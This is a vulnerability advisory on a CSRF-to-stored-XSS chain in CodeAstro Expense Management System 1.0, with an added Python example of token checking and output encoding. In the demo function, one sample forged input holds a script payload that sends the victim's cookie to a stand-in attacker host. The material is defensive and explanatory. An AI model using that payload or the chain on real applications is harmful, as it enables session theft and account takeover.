CodeAstro Expense Management System Cross-Site Request Forgery Vulnerability

Vulnerability

A cross-site request forgery (CSRF) vulnerability has been identified in CodeAstro Expense Management System version 1.0. The application accepts state-changing requests, such as adding an expense entry, without verifying that they originated from its own forms. An attacker can therefore host a page or craft a link that, when visited by a logged-in user, silently submits a request with the victim's session and creates an expense entry the user never intended. The same forged request can carry a JavaScript payload in the expense fields; because the application renders those fields without output encoding, the payload executes in the victim's browser the next time they open the Manage Expenses section. This chaining of CSRF with stored cross-site scripting (XSS) can be used to steal the session cookie and take over the account.
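
The following is an added example, not code from the advisory or from CodeAstro, showing the two controls whose absence the description implies: a synchronizer-token check that rejects a request the application's own form did not issue, and HTML output encoding of the stored expense fields so a script payload that does get stored is rendered as text. It is written in Python for readability; the field names (`csrf_token`, `title`, `amount`) and the sample requests are assumptions constructed for the example.

```python
"""Added example (not from the advisory or CodeAstro): a hardened
'add expense' handler with a per-session anti-CSRF token and HTML
output encoding for the Manage Expenses view. Field names are assumed."""
import hmac
import html
import secrets


def issue_csrf_token(session: dict) -> str:
    """Mint a random per-session token; the legitimate form embeds it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_is_valid(session: dict, form: dict) -> bool:
    """Accept only if the submitted token matches the one stored server-side.
    A cross-site page cannot read the victim's session token, so a forged
    request arrives without it (or with a wrong one) and is rejected."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)  # constant-time compare


def add_expense(session: dict, form: dict, store: list) -> bool:
    """Hardened handler: refuse the request unless the CSRF check passes.
    Fields are stored raw; encoding belongs at output time (see below)."""
    if not csrf_token_is_valid(session, form):
        return False
    store.append({"title": form.get("title", ""), "amount": form.get("amount", "")})
    return True


def render_expense_row(expense: dict) -> str:
    """Manage Expenses row with every attacker-controlled field HTML-encoded,
    so a stored <script> payload is displayed, not executed."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(expense["title"], quote=True),
        html.escape(expense["amount"], quote=True),
    )


def demo() -> tuple:
    """Run a forged and a legitimate request through the handler."""
    session = {}
    store = []
    # Constructed forged request: auto-submitted from an attacker page,
    # carrying the victim's cookies but no token, with an XSS payload.
    forged = {
        "title": "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
        "amount": "1",
    }
    forged_accepted = add_expense(session, forged, store)
    # Legitimate request from the application's own form, token included.
    token = issue_csrf_token(session)
    legit = {"csrf_token": token, "title": "<b>Lunch</b>", "amount": "12.50"}
    legit_accepted = add_expense(session, legit, store)
    return forged_accepted, legit_accepted, render_expense_row(store[0])


if __name__ == "__main__":
    print(demo())
```

The token check stops the forged write entirely; the output encoding is the second, independent layer, so that even an entry that reaches the database through some other path cannot run script in the Manage Expenses section.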

Impact

Exploitation could result in unauthorized actions being performed on behalf of authenticated users (for example, unwanted expense entries) and in attacker-controlled script executing in the context of the victim's session when the Manage Expenses section is viewed, which can lead to session cookie theft and account takeover. Exploitation requires a logged-in user to visit attacker-controlled content.

Added: Jun 22, 2025, 2:20 PM
Updated: Jun 22, 2025, 2:20 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 1.7
exploitability: 7.7
remediation: 0.0
relevance: 0.2
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these eight key vulnerability categories, which are then combined to calculate the overall risk score.